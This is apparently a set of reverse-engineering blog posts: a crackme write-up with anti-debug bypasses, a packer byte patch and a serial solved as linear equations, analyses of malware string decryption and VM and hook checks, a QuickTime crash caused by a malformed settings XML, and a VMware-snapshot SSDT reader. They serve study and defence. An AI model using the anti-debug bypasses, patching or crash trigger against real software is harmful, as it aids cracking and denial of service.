Here is the solution I sent to crackmes.de, the crackme is easy but really enjoyable. You can find the crackme at http://www.crackmes.de/users/hmx0101/crappy_fun/

Intro
The crackme is packed with a home-made custom packer. When you run the file, the unpacking process starts, and when it finishes you should have the original file running on your system. This time that doesn’t happen: the crackme crashes. Our job is to identify the reason behind the crash and, once the file is fixed, to search for the right serial.

How to locate where the error occurs
What the hell causes the crash? This is the main question, but the real problem is: how do you locate where the error occurs in an easy way?
You can analyse the file from beginning to end; that’s the right way, but it can take a lot of time. I prefer to go the other way, starting from the crash.

As you know, running the file produces a crash. The error box doesn’t help much because it shows an error offset of 00059a5a, and looking at the original exe file I didn’t find anything useful at that address. I decided to take a look at the crash dump file generated by the OS. The file I’m referring to is named user.dmp and it’s located under the Dr Watson folder. It contains information about the last crash that occurred, the one I’m interested in. To retrieve some information from the file you can load it into Windbg. The classic “!analyze -v” will reveal some hidden info (I copy and paste only some lines):

DEFAULT_BUCKET_ID:  BAD_INSTRUCTION_PTR

LAST_CONTROL_TRANSFER:  from 00405bf9 to 00059a5a

STACK_TEXT:
WARNING: Frame IP not in any known module. Following frames may be wrong.
0013ff98 00405bf9 00000000 5d4d0000 00454fe0 0x59a5a
0013ffbc 00469e0b 7c817067 00390032 00390038 CrappyFun+0x5bf9
00400000 00000000 000f0004 0000ffff 000000b8 CrappyFun+0x69e0b

FOLLOWUP_IP:
CrappyFun+5bf9
00405bf9 2c50            sub     al,50h

- DEFAULT_BUCKET_ID
the DEFAULT_BUCKET_ID field shows the general category of failures that this failure belongs to. The name of the category says it all.

- LAST_CONTROL_TRANSFER
it shows the last call on the stack. In this case, it seems the code at address 0x405BF9 called a function at 0x59A5A

- STACK_TEXT
it shows a stack trace of the faulting component.

- FOLLOWUP_IP
When !analyze determines the instruction that has probably caused the error, it displays it in the FOLLOWUP_IP field.

I think Windbg is not able to produce good output here; there seem to be some errors in it. I don’t think the error occurs at 405BF9, I think it occurs at the previous instruction, which is something like “Call 00059a5a”. I got this idea looking at the STACK_TEXT contents.
Windbg shows the code from the original file, which is still packed, so if you want to inspect the real code around 0x405BF9 you have to dump the exe. You can dump it when the error box appears. Here’s the unpacked snippet:

405BF2 push    0
405BF4 call    sub_405B24
405BF9 mov     ds:dword_458664, eax

405B24 jmp     ds:dword_4591E4

4591E4 dword_4591E4    dd 59A5Ah

Bingo! The error occurs inside the call at 405BF4. Now I only have to find out what 0x59A5A represents. If you are using IDA you’ll see:

4591D8 dword_4591D8    dd 59A30h               ; DATA XREF: sub_405B3C
4591DC dword_4591DC    dd 59A3Eh               ; DATA XREF: sub_405B34
4591E0 dword_4591E0    dd 59A4Ch               ; DATA XREF: sub_405B2C
4591E4 dword_4591E4    dd 59A5Ah               ; DATA XREF: sub_405B24

These addresses are referenced by instructions like:

jmp ds:dword_0045xxxx

It’s pretty obvious now: these are unresolved imports. That’s why the exe crashes.
Presumably the point to fix is inside the procedure used to resolve the API addresses. A good and quick way to find it consists of setting some clever breakpoints on functions like LoadLibrary/GetProcAddress; after a few minutes I had the right point to patch.

This is how I solved the first task (fixing the unpacked file). I think it’s the fastest way because you start looking through the loader knowing what you are looking for.
Before giving out what to patch I’ll spend a few words on the loader. I’m writing a solution, so I’ll try to give you a fairly detailed analysis of the packer too.

The packer
The packer has a linear loader, it makes everything easy. The loader starts with an RDTSC trick, it’s located inside the first ten lines of code. The check is performed here:

00469C2B CMP EAX,0FFF
00469C30 JNB CrappyFu.00469E04
00469C36 CALL CrappyFu.00469C3B

If the program detects the presence of a debugger you won’t pass through 469C36. So, if you want to continue studying the exe you first have to get rid of this check.

Just after the initial check you can find a decryption loop:

00469C54 MOV EBX,CrappyFu.00469C72	//	Initial address
00469C59 MOV ECX,384			//	Number of bytes to decrypt
00469C5E MOV AL,9A			//
00469C60 XOR BYTE PTR DS:[ECX+EBX],AL	//	Xor decryption
00469C63 MOV AL,BYTE PTR DS:[ECX+EBX]	//	Decrypted byte is used to decrypt the next one
00469C66 LOOPD SHORT CrappyFu.00469C60	//	Jump up for the next byte to decrypt
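The loop above is easy to replay outside the debugger. What follows is only a minimal Python sketch of it, under the assumption that `buf` models the memory starting at EBX (so index 0 is 469C72 and is never touched, because LOOPD stops when ECX reaches 0); the function names are mine, not the packer’s.

```python
def decrypt(buf: bytes, seed: int = 0x9A) -> bytes:
    """Replay the loader loop: walk from the last byte down to index 1."""
    out = bytearray(buf)
    key = seed                               # MOV AL,9A
    for i in range(len(out) - 1, 0, -1):     # ECX = len-1 .. 1
        out[i] ^= key                        # XOR BYTE PTR DS:[ECX+EBX],AL
        key = out[i]                         # MOV AL,BYTE PTR DS:[ECX+EBX]
    return bytes(out)


def encrypt(plain: bytes, seed: int = 0x9A) -> bytes:
    """Inverse operation: each byte is XORed with the plaintext byte after it."""
    out = bytearray(plain)
    key = seed
    for i in range(len(out) - 1, 0, -1):
        out[i] = plain[i] ^ key
        key = plain[i]
    return bytes(out)


sample = bytes(range(16))                    # arbitrary test data
round_trip = decrypt(encrypt(sample))
```

The useful property to notice is that the key for a byte is the decrypted byte at the next higher address, which matters later when the loader has to be patched.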

The packer’s code was encrypted using a xor operation. When the loop ends you have the packer’s code in front of your eyes, the first thing you should see is an anti debug trick:

00469C68 MOV EAX,DWORD PTR FS:[18]
00469C6F MOV EAX,DWORD PTR DS:[EAX+30]
00469C73 MOVZX EAX,BYTE PTR DS:[EAX+2]
00469C78 CMP EAX,1
00469C7B JE CrappyFu.00469E04

The good old IsDebuggerPresent. You should know how to pass it. It’s the second trick, and if you want to continue analyzing the exe remember to avoid it too. Moreover you’ll have to avoid the next one too:

00469CAA XOR ECX,ECX
00469CAC ADD ECX,10
00469CAF MOV EBX,77FFFFFF
00469CB4 MOV EAX,DWORD PTR FS:[EBX+88000019]	//	eax = 7FFDE000... fs:[18]
00469CBB MOV EAX,DWORD PTR DS:[EAX+ECX*2+10]	//	It's IsDebuggerPresent check!!!
00469CBF MOVZX EAX,BYTE PTR DS:[EAX+2]		//
00469CC3 NOT EAX
00469CC5 AND EAX,1
00469CC8 MOV EBX,EAX				//	ebx = 0 if you are debugging the file
00469CCA PUSH 0C3FBF6				//	Push a dword value
00469CCF CALL CrappyFu.00469CD4
00469CD4 SUB DWORD PTR SS:[ESP],33		//	Fix the return value
00469CD8 MOV ESI,ESP				//
00469CDA ADD ESI,4				//	esi -> value pushed at 469CCA
00469CDD JMP ESI				//	jump to esi

A nice antidebug trick. It’s an IsDebuggerPresent check performed in an unusual way. In the previous check there’s a compare between the value stored in eax and 1; this time the check is a little bit more twisted.
“PUSH 0C3FBF6” looks like a simple push of a dword value, but if you look carefully at the next instructions you’ll discover the real meaning of the dword value:

0012FFC0   F6FB      IDIV BL				//	F6 FB
0012FFC2   C3        RETN				//	C3
0012FFC3   0069 EB   ADD BYTE PTR DS:[ECX-15],CH	//	00

The author uses an idiv instruction as the final check: if you are debugging the file bl will be 0 and the idiv instruction will raise a divide-by-zero exception. Otherwise, you won’t get any error and the packer will proceed without any problems.
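The arithmetic hidden in this trick can be double checked with a few lines of Python. This is just a sketch of the numbers involved (the variable and function names are mine), it doesn’t touch the crackme itself.

```python
import struct

# PUSH 0C3FBF6 stores the dword little-endian, so the stack holds the bytes
# F6 FB (IDIV BL), C3 (RETN) and a trailing 00.
pushed_code = struct.pack("<I", 0x00C3FBF6)

# FS:[EBX+88000019] with EBX = 77FFFFFF wraps around 32 bits to FS:[18].
teb_self_offset = (0x77FFFFFF + 0x88000019) & 0xFFFFFFFF

# [EAX+ECX*2+10] with ECX = 10h is [EAX+30], the same offset used by the
# plain check at 469C6F.
peb_offset = 0x10 * 2 + 0x10


def bl_after_check(being_debugged: int) -> int:
    """NOT EAX / AND EAX,1 applied to the byte read at [EAX+2]."""
    return (~being_debugged) & 1
```

With the flag set to 1 the divisor becomes 0, which is exactly the case where IDIV BL faults.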

The next step performed by the packer is another decryption loop. This time it’s not as easy as the first one we saw at the beginning, but it’s not hard to understand how it works. The routine decrypts the code section using a dynamically allocated buffer, obtained with VirtualAlloc; since I only need to know where the crash occurs, I’m not interested in this decryption for now. If you want to check the routine, pay attention to the antidebug trick: there’s a breakpoint check.

Ok, we are at the end of the loader. The last part of the code is between addresses 0x469E0B and 0x469F05. The snippet starts with:

00469E0B PUSHAD
00469E0C JMP SHORT CrappyFu.00469E12

ending with:

00469EFD PUSH 54FD0 //
00469F02 ADD DWORD PTR SS:[ESP],EBP // I guess oep is at 454FD0 (54FD0 + image base 400000 in EBP)
00469F05 RETN //

The code between these two addresses performs a couple of steps:
- decrypt a lot of strings (again, xor decryption)
- retrieve the addresses of the API functions
I’m near the solution. Let’s take a look at the routine used to retrieve the addresses (I removed parts of the code):

00469E85 CMP DWORD PTR DS:[EDX],0		//	Is there another address to retrieve? EDX = 0x459118
00469E88 JE SHORT CrappyFu.00469EE3		//	No: jump out
...
00469EA7 PUSH EAX				//	eax -> current function
...
00469EC4 PUSH EBX
00469EC5 CALL ESI				//	GetProcAddress applied to the current function
...
00469EC9 TEST EAX,EAX				//	Address ok?
00469ECB JE CrappyFu.00469E04			//	Jump if error occurs
00469ED1 CMP BYTE PTR DS:[EAX],0CC		//	Is there a bpx on the first byte of the current function?
00469ED4 JE CrappyFu.00469E04			//	Yes: error!
00469EDA JMP SHORT CrappyFu.00469EDE		//	No: jump... !?!
00469EDC MOV DWORD PTR DS:[EDX],EAX		//	NOT EXECUTED
00469EDE ADD EDX,4				//	Update edx
00469EE1 JMP SHORT CrappyFu.00469E85

Do you remember why the crash occurs? The file crashes because there’s a problem with the value stored at 4591E4. At 469E85 edx has the value 459118, pretty near the address of the suspicious dword. This is a big hint: I’m in front of the bugged code.
The snippet is a classic piece of code used to fix imported functions; there’s only one strange thing inside it, the code around 469EDA. What happens to the retrieved address? Nothing… it’s simply discarded!

How to fix it?
I decided to nop the jump instruction at 469EDA. I want to change:

00469ED4  0F84 2AFFFFFF    JE CrappyFu.00469E04
00469EDA  EB 02            JMP SHORT CrappyFu.00469EDE
00469EDC  8902             MOV DWORD PTR DS:[EDX],EAX

into:

00469ED4  0F84 2AFFFFFF    JE zai_Crap.00469E04
00469EDA  90               NOP
00469EDB  90               NOP
00469EDC  8902             MOV DWORD PTR DS:[EDX],EAX

Do you remember the initial xor decryption? Each byte is decrypted using the decrypted byte that follows it, so changing the plaintext at 469EDA also changes the key of the byte before it, 469ED9. This is what I have to solve:

Byte to find ^ *key* = decrypted_byte
byte_469EDB  ^ 0x89  = 0x90	    	-->	byte_469EDB = 0x19
byte_469EDA  ^ 0x90  = 0x90		-->	byte_469EDA = 0x00
byte_469ED9  ^ 0x90  = 0xFF		-->	byte_469ED9 = 0x6F

You can modify the original exe file patching the bytes between 469ED9/469EDB with 0x6F, 0x00 and 0x19 (offset 0x334D9/0x334DB). Now I have a working crackme.
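The three patch bytes can be recomputed mechanically. Here is a small Python sketch of the calculation; `encrypted_bytes` is a helper name I made up, and it only assumes what the loader loop shows: every byte is XORed with the plaintext byte stored at the next address.

```python
def encrypted_bytes(plain: bytes, next_plain_byte: int) -> bytes:
    """Encrypt a run of plaintext bytes for the loader's xor chain.

    `next_plain_byte` is the plaintext byte that follows the run in memory;
    it acts as the key for the last byte of the run.
    """
    keys = plain[1:] + bytes([next_plain_byte])
    return bytes(p ^ k for p, k in zip(plain, keys))


# Wanted plaintext at 469ED9..469EDB: FF (end of the JE), 90, 90.
# The byte that follows, at 469EDC, is 89 (first byte of MOV [EDX],EAX).
patch = encrypted_bytes(bytes([0xFF, 0x90, 0x90]), 0x89)
```

The byte at 469ED9 keeps its plaintext value (FF) but still has to be rewritten, because its key used to be EB and is now 90.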

Task 2: the right serial
The crackme is a Delphi application; Dede will tell you everything about the file. The serial check routine starts at 0x454C98 (TForm1_Button1Click). It gets the serial, which must be 6 chars long. The main procedure starts at 0x45475C; it’s a really long procedure. I have to say I wanted to give up, but it’s easier than it seems. There are mainly 3 functions, called many times. The functions I’m referring to are Multiply, Add and Sub; here are some snippets taken from the code:

454773 mov dl, [ebp+s_6]
454776 mov ecx, 4
45477B mov eax, 6 // Multiplier
454780 call Multiply // Execute: eax * dl

45480B pop edx
45480C call add // Execute: eax + edx

454821 pop edx
454822 call sub // Execute: eax - edx

Try stepping a little inside the procedure and you’ll surely get the main point of the routine. If you have Ida you don’t have to step a single line because you can understand everything from the dead listing.
The entire procedure is used to create a system of linear equations, 6 equations in 6 variables:

1 * s1 + 3 * s2 + 2 * s3 - 3 * s4 - 4 * s5 - 6 * s6 = -453
2 * s1 - 7 * s2 + 3 * s3 + 7 * s4 + 2 * s5 + 1 * s6 = 849
7 * s1 + 9 * s2 - 6 * s3 - 4 * s4 - 6 * s5 + 7 * s6 = -218
5 * s1 + 2 * s2 + 4 * s3 + 2 * s4 + 4 * s5 - 1 * s6 = 1643
3 * s1 - 1 * s2 + 1 * s3 - 1 * s4 + 1 * s5 - 1 * s6 = 192
8 * s1 - 2 * s2 + 1 * s3 + 1 * s4 - 4 * s5 + 1 * s6 = 134

where s1..s6 are the 6 chars from the serial. The final check is done calling 6 functions sequentially. Each function performs 1 check: the first function checks the 1st equation (it must be equal to -453), the 2nd function checks the 2nd equation (it must be equal to 849) and so on…
I think you can easily find out how the checks are done.

Is it possible to solve the system?
Rank is 6, so there’s only 1 solution. When I was at uni I was able to solve such systems in a short time, but now I’m a bit rusty. I could have used the elementary method, substitution… but I preferred to use an automatic solver. The result is:
s1 = 70 : F
s2 = 97 : a
s3 = 105 : i
s4 = 114 : r
s5 = 121 : y
s6 = 33 : !

The right serial is Fairy!
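For anyone who wants to redo the computation without an external engine, here is a minimal sketch in Python. It is not the tool I used: it’s a plain Gauss-Jordan elimination over exact fractions, fed with the coefficients of the six equations above.

```python
from fractions import Fraction

A = [
    [1,  3,  2, -3, -4, -6],
    [2, -7,  3,  7,  2,  1],
    [7,  9, -6, -4, -6,  7],
    [5,  2,  4,  2,  4, -1],
    [3, -1,  1, -1,  1, -1],
    [8, -2,  1,  1, -4,  1],
]
b = [-453, 849, -218, 1643, 192, 134]


def solve(a, rhs):
    """Gauss-Jordan elimination with exact arithmetic (square, full rank)."""
    n = len(a)
    m = [[Fraction(x) for x in row] + [Fraction(r)] for row, r in zip(a, rhs)]
    for col in range(n):
        # Find a row with a non-zero entry in this column and move it up.
        pivot = next(r for r in range(col, n) if m[r][col] != 0)
        m[col], m[pivot] = m[pivot], m[col]
        # Scale the pivot row so the pivot becomes 1.
        m[col] = [x / m[col][col] for x in m[col]]
        # Clear the column in every other row.
        for r in range(n):
            if r != col and m[r][col] != 0:
                factor = m[r][col]
                m[r] = [x - factor * y for x, y in zip(m[r], m[col])]
    return [row[n] for row in m]


solution = solve(A, b)
serial = "".join(chr(int(s)) for s in solution)
```

Using `Fraction` avoids any rounding problem, so the values come out as exact integers that can be turned into characters directly.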

This is a sort of continuation of the previous post, the one about the malware that infects right-handed users only.
It’s an Msn malware, one of the recent ones (as far as I remember I got it from Malware Domain List). I think there’s often something interesting inside a malware, no matter what it does, and this is a perfect example!

The malware is not really interesting per se, but it has something I’ve never noticed before. It’s not a cool and dangerous new technique, but a coding behaviour. Look at the graph overview:

The image represents the content of a malware procedure. Nothing strange per se, except the fact that it contains 657 instructions, too many for a simple malware. It’s a big routine and I was surprised at first because you can do a lot of things with so many instructions. I started analysing the code: nothing is passed to the routine and nothing is returned to the caller. I thought it would be an important part of the malware, but I was disappointed by the real content of the routine. After a few seconds I realized what’s really going on: 657 lines of code for doing something that normally would require around 50 lines…
The function contains a block of 17 instructions repeated 38 times. When I’m facing things like that I always have a little discussion with my brain. The questions are:
- why do you need to repeat each block 38 times?
- can’t you just use a while statement?
- is this a sort of anti-disassembling trick?
- can you produce such a procedure setting up some specific compiler’s options?

The repeated block contains the instructions below:

00402175    push 9                       ; Length of the string to decrypt
00402177    push offset ntdll_dll        ; String to decrypt
0040217C    push offset aM4l0x123456789  ; key: "M4L0X123456789"
00402181    call sub_401050              ; decrypt "ntdll.dll"
00402186    add  esp, 0Ch
00402189    mov  edi, eax
0040218B    mov  edx, offset ntdll_dll
00402190    or   ecx, 0FFFFFFFFh
00402193    xor  eax, eax
00402195    repne scasb
00402197    not  ecx
00402199    sub  edi, ecx
0040219B    mov  esi, edi
0040219D    mov  eax, ecx
0040219F    mov  edi, edx
004021A1    shr  ecx, 2
004021A4    rep movsd
004021A6    mov  ecx, eax
004021A8    and  ecx, 3
004021AB    rep movsb

It’s only a decryption routine, nothing more. The string is decrypted by the “call 401050”; the rest of the code simply moves the string into the right buffer.
Ok, let’s try answering the initial questions.

According to some PE scanners the exe file was produced by Microsoft Visual C++ 6.0 SPx.
It’s possible to code the big procedure using just a loop (while, for, do-while) containing the snippet above. I don’t think the author used one of these statements because, as far as I know, it’s not possible to tell the compiler to explode a loop into a sequence of blocks like this. At this point I have two options:
- he wrote the same block 38 times
- he defined a macro with the block’s instructions, repeating the macro 38 times
I wouldn’t code something like that, but the macro option seems to be the most probable choice.
Is it an anti-disassembling trick? My answer is no, because such code is really easy to read. You don’t have to deal with variables used inside a for/while; to understand what’s going on you only have to compare three or four blocks.
I don’t have a valid answer to the doubt I had at first….

Trying to find out some more info I studied the rest of the code. I was quite surprised to see another funny diagram.

This time the image represents the content of the procedure used to retrieve the addresses of the API functions. Again, no while/for/do-while statement. The rectangle in the upper part of the image is a sequence of calls to GetProcAddress, and the code below is just a sequence of checks on the addresses obtained by GetProcAddress.
It’s a series of:

address = GetProcAddress(hDLL, "function_name");

followed by a series of:

if (!address) goto _error;

Apart from the absence of a loop there’s something more this time, something that I think reveals an unusual coding style: the author checks for errors at the end of the procedure. I always prefer to check return values as soon as I can; it’s not a rule, but it helps you avoid oversights and potential errors… The procedure has a little bug/oversight at the end: the author forgot to close an open handle. Just a coincidence?

Anyway, two procedures without a single loop. It seems the author avoided any kind of loop by choice. In case you still have some doubts here’s another cool picture for you:

The routine inside the picture contains the code used to check if the API(s) are patched or not. The check is done comparing the first byte with 0xE8 and 0xE9 (call and jump). If the functions are not patched the malware goes on, otherwise it ends. As you can see no loops are used.
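Just to show how little code the check needs when a loop is allowed, here is a sketch in Python. It only models the logic described above (first byte equal to 0xE8 or 0xE9); the table of function names and first bytes is invented for the example, it’s not taken from the malware.

```python
HOOK_OPCODES = {0xE8, 0xE9}   # CALL rel32 and JMP rel32


def looks_patched(first_byte: int) -> bool:
    """True when a function starts with a call or a jump."""
    return first_byte in HOOK_OPCODES


def all_clean(first_bytes: dict) -> bool:
    """One loop over the whole table instead of one block per API."""
    return not any(looks_patched(b) for b in first_bytes.values())


# Hypothetical data: API name -> first byte read at its entry point.
clean_table = {"CreateFileA": 0x8B, "WriteFile": 0x6A}
hooked_table = {"CreateFileA": 0x8B, "WriteFile": 0xE9}
```

A table plus a loop gives the same result as the unrolled code, and it makes the early-exit behaviour explicit.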

In summary: it’s not jungle code, it’s not an anti-disasm code and it’s not a specific compiler setting. I think it’s only a personal choice, but I would really like to know why the author used this particular style.
Do you have any suggestions?

Beyond the coding style, the malware has some more strange things. As pointed out by *asaperlo*, the code contains a bugged RC4 implementation (Look at the comments of the previous blog post).
It also has a virtual machine check. The idea is pretty simple: the malware checks the name of the current user. If the name is “sandbox” or “vmware” it assumes it’s running under a virtual machine…
This malware spawns another one (it’s encrypted inside the file), it might be material for another post.

That’s a funny coded malware for sure!

I’m not kidding, the title is right.

Among all the Windows settings there’s one made for left-handed people. The option I’m referring to is located in the Mouse control panel, labelled “Switch primary and secondary buttons”. It lets you exchange the functions performed by the right and left mouse buttons. I don’t know if this setting is useful or not; most of my left-handed friends still use the mouse like a right-handed person. Maybe they don’t even know such an option exists. Anyway, look at this code:

It’s a simple query on a registry key named SwapMouseButtons.
result_value is sent back to the caller, and the caller checks the value. If the value is equal to 0x30 (the character ‘0’, right handed) the malware goes on running the rest of the code, but if the value is 0x31 (the character ‘1’, left handed) the malware ends immediately. All the nasty things performed by the malware are executed after this check, which means that a left-handed user won’t get infected!

I’ve seen some malware using the SwapMouseButton function in the past, but never something like that. I bet the author is left handed and wrote the check just to avoid infecting himself… I can’t think of anything else. Quite funny!!!
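The decision made by the caller fits in a couple of lines. This Python sketch only models that comparison; the function name is mine, and treating every value other than 0x30 as “stop” is an assumption, since I only described the 0x30 and 0x31 cases.

```python
def keeps_running(swap_mouse_buttons: str) -> bool:
    """Model the caller's test on the first character of the registry string."""
    first = ord(swap_mouse_buttons[:1] or "\0")
    return first == 0x30          # '0': buttons not swapped (right handed)


right_handed = keeps_running("0")
left_handed = keeps_running("1")
```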

QTPlayerSession.xml (located under %USERPROFILE%\Application Data\Apple Computer\QuickTime\) is used to store various user settings. Among other things, it’s used to save a list of favorite movies and a list of the recently opened files. These lists are called FavoritesListName and MRUListNameWithURLs; here is a possible definition:



There’s a *key* definition followed by an *array* keyword. Inside the *array* tags QuickTime saves some values.
A single item is composed of two lines: the first one (“test 1”) is the name shown by QuickTime while the other (“C:\Programs\QuickTime\Sample.mov”) is the path of the file. No matter what you write inside the string tag, QuickTime doesn’t check whether the text is valid or not.
When QuickTime is fully loaded you can see the items under the *favorites* and *open recent* menu items (I don’t know the exact English names because I have an Italian version of the software).

When QuickTime starts, it retrieves all the information it needs by parsing the xml file. It scans the MRUListNameWithURLs values, and after that it checks the FavoritesListName list. Like every parser, it scans the file tag by tag, saving the content of each line in memory. When all the necessary structures are stored in memory, the program retrieves the stored information in order to put it in the right places: *recent opened files* and *favorites files*.

QuickTime takes the values to put inside the two menu items running this piece of code:
1: movzx eax, word ptr [esi]
2: lea eax, [esi+eax*4+4]
3: lea eax, [eax+edi*4]

After the instruction at line 2 the EAX register points to a series of DWORD values; each DWORD contains a pointer to a single piece of information to retrieve. EDI is the index, because the dwords are taken one at a time. When MRUListNameWithURLs is checked I have something like:
EAX -> 68 D2 34 01 08 D3 34 01 D8 D3 34 01 50 D4 34 01 0D F0 AD BA AB AB AB AB
0134D268 points to a structure containing “Another test”
0134D308 points to a structure containing “C:\abc.mov”
0134D3D8 points to a structure containing “The last one”
0134D450 points to a structure containing “path”

The bytes above are stored in a piece of memory allocated at runtime using the RtlAllocateHeap function. Every time the snippet above is executed the program takes a single string, depending on the index value. The items retrieved from the xml file are shown under the right menus when QuickTime is fully loaded. As I said before, there are two lines for every file, so QuickTime always executes the code twice per item. The last 8 bytes pointed to by EAX are not related to any string, they are just old bytes.
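The dump is easier to read once it’s split into little-endian dwords. Here is a small Python sketch that does it with the bytes listed above; `slot_address` is a name I made up to mirror the `lea eax, [eax+edi*4]` instruction.

```python
import struct

# The 24 bytes shown above, exactly as they appear in memory.
dump = bytes.fromhex(
    "68 D2 34 01 08 D3 34 01 D8 D3 34 01 50 D4 34 01"
    " 0D F0 AD BA AB AB AB AB"
)

# Six little-endian dwords: four pointers plus two leftover values.
slots = struct.unpack("<6I", dump)


def slot_address(base: int, index: int) -> int:
    """Address of the index-th dword, as computed by lea eax, [eax+edi*4]."""
    return base + index * 4
```

The two trailing dwords decode to BAADF00D and ABABABAB. As far as I know these are the fill patterns the Windows heap uses for uninitialized and guard bytes when a process runs under a debugger, which would fit the idea that they don’t belong to any string.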

Can you understand what I’m trying to say?
The xml file is updated by QuickTime, but you can edit it. The problem occurs when you modify FavoritesListName and MRUListNameWithURLs a little, using something like:



You can modify FavoritesListName in the same way. Of course you can define some more items. The point is that QuickTime is not able to handle an item definition without both of the necessary lines (name to display and path of the file) inside MRUListNameWithURLs and FavoritesListName; writing 1 or 3 or 5 or 7 (or 9…) lines between the *array* tags always gives the same result, a crash.
Why? Well, because the program will take the next 4 uninitialized bytes as a pointer, and you don’t know what they are.
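If you want to check a settings file before QuickTime does, counting the lines is enough. The Python sketch below is only an illustration: the XML layout in the samples (a *key* element followed by an *array* of *string* elements inside a *dict*) is my assumption based on the description above, not a copy of a real QTPlayerSession.xml, and `odd_lists` is a hypothetical helper.

```python
import xml.etree.ElementTree as ET

LISTS = {"MRUListNameWithURLs", "FavoritesListName"}


def odd_lists(xml_text: str) -> list:
    """Return the names of the lists holding an odd number of strings."""
    root = ET.fromstring(xml_text)
    bad = []
    for parent in root.iter():
        children = list(parent)
        # Look at every (key, following sibling) pair under this element.
        for key, value in zip(children, children[1:]):
            if key.tag == "key" and key.text in LISTS and value.tag == "array":
                if len(value.findall("string")) % 2:
                    bad.append(key.text)
    return bad


# Assumed layout: name and path come in pairs.
SAMPLE_OK = r"""<dict>
  <key>MRUListNameWithURLs</key>
  <array>
    <string>test 1</string>
    <string>C:\Programs\QuickTime\Sample.mov</string>
  </array>
</dict>"""

# Same list with the path line removed: one string only.
SAMPLE_BAD = r"""<dict>
  <key>MRUListNameWithURLs</key>
  <array>
    <string>test 1</string>
  </array>
</dict>"""
```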

I could be wrong, but I don’t think it’s possible to exploit it. It’s a bug that can lead to a sort of denial of service because the crash occurs during the initialization process. If your copy crashes you can try checking the xml file.

Some time ago I blogged about Vmware snapshots, introducing a way to recognize hidden files by simply comparing two snapshots. I wanted to extend my research on the subject a little bit more, but I didn’t. In the last few days I got the opportunity to put my hands on some snapshots again. I didn’t have anything particular in mind, but I was surprised by some coincidences. Look at the information below:

80544bc0: 804fc624 00000000 0000011c 804fca98
80544bd0: bf995ba8 00000000 0000029a bf98f5f8
80544be0: 00000000 00000000 00000000 00000000
80544bf0: 00000000 00000000 00000000 00000000

00544BC0: 24C6 4F80 0000 0000 1C01 0000 98CA 4F80 $.O...........O.
00544BD0: A85B 99BF 0000 0000 9A02 0000 F8F5 98BF .[..............
00544BE0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00544BF0: 0000 0000 0000 0000 0000 0000 0000 0000 ................

The first 4 lines are taken from Windbg while I was debugging an XP sp1 virtual machine running under Vmware; the last 4 lines are taken from a saved Vmware snapshot (same OS of course).
Do you see anything useful? These are KeServiceDescriptorTable[0],[1],[2],[3] and they of course have the same bytes, but there’s something else. There’s a connection between the addresses in the first block and the offsets in the second one: just remove the first 2 digits from the address. Do you see it? Look here: 80544BC0/544BC0, 80544BD0/544BD0, 80544BE0/544BE0, 80544BF0/544BF0.
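The relation between the two dumps can be written down in a few lines of Python. This is only a sketch of what I observed on my snapshots: the constant 0x80000000 simply encodes “remove the first 2 digits” for these addresses, it’s not a documented rule of the snapshot format, and the field names are the usual ones for a service descriptor table entry.

```python
import struct

KERNEL_BASE = 0x80000000   # assumption: holds for the addresses shown above


def snapshot_offset(kernel_va: int) -> int:
    """Translate a kernel address into an offset inside the snapshot file."""
    return kernel_va - KERNEL_BASE


# The 16 bytes found at snapshot offset 00544BC0 (first line of the hex dump).
raw = bytes.fromhex("24C64F80 00000000 1C010000 98CA4F80")

# KeServiceDescriptorTable[0]: table base, counter table, count, argument table.
table_base, counter_base, service_count, arg_table = struct.unpack("<4I", raw)
```

Once the table base is known, the same translation gives the offset of the service table itself, which holds `service_count` dwords.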

It seems the kernel memory is stored inside the snapshot. That’s not totally true: only a part of the kernel memory is stored inside a Vmware snapshot. All the KeServiceDescriptorTable entries are present btw.
The SSDT is inside the snapshot I have and it’s complete; the SSDT Shadow seems to be inside the snapshot too, but there’s no direct connection between kernel memory and snapshot addresses, and it’s not complete (it needs some more research btw).

Is it only a coincidence? I tried with some XP machines and the result is the same: it’s possible to obtain real information about the SSDT. According to Kayaker’s test it should work on win2k too (I don’t remember the service pack he was using…).

With this new information it’s pretty easy to code a SSDT revealer. I gave it a try and here is a result:

You can use the program to display SSDT entries and to find out modified entries too by simply comparing an original snapshot with another one.

To retrieve information from a snapshot you have to provide the address of KeServiceDescriptorTable[0] (something like 80544BC0, no “0x” prefix), and you have to select the OS of the virtual machine. After that you can:
1. save an untouched SSDT using the button labelled “Create untouched SSDT”
2. retrieve SSDT information from a snapshot by simply pushing the button labelled “Get snapshot SSDT”. Checking “Load untouched SSDT data” you can compare the original table (previously saved) with the one from the snapshot you’ll select. If a service has been changed you’ll read the word “YES” in the last column.
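The comparison behind the “YES” column is nothing more than an entry-by-entry diff. Here is a sketch of the idea in Python; it’s not the source of my program, and the addresses in the example are invented.

```python
def modified_services(untouched, current):
    """Return (index, original, current) for every SSDT entry that differs.

    Both arguments are sequences of service addresses; if the lengths
    differ, only the common part is compared.
    """
    return [
        (index, old, new)
        for index, (old, new) in enumerate(zip(untouched, current))
        if old != new
    ]


# Hypothetical tables: entry 1 points outside the kernel in the second one.
clean_ssdt = [0x80591BFB, 0x80574E42, 0x8057A0B0]
suspect_ssdt = [0x80591BFB, 0xF7A5C1D0, 0x8057A0B0]
changes = modified_services(clean_ssdt, suspect_ssdt)
```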

I took the name of the services from this table: http://metasploit.com/users/opcode/syscalls.html
I can’t test all the OS, if you find one or more errors drop me a mail.

Following this method it’s also possible to get the list of the running processes/modules, more about this later.

SSDT from snapshot

Most of the malicious javascripts out there are encrypted, sometimes using commercial tools or, most of the time, using home-made tricks. Is it really necessary? I mean: if you want to protect your page, do you really need an encryption tool?

I think the answer is no, it’s a useless waste of time (and sometimes money). Most of the time an automatic decoder is able to show the original code in a few milliseconds, and when it fails you can use your brain… not so fast, but it will surely help you solve the puzzle.
Even if you are able to fool one or more automatic decoders, it doesn’t mean you have protected your script from unwanted eyes.

A simple proof is given by a piece of code I found at EvilCry’s blog. The code I’m referring to is:

<html><head><Meta Name=Encoder Content=HTMLSHIP>
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<noscript><iframe></iframe></noscript>
<script language="javascript">
<!--
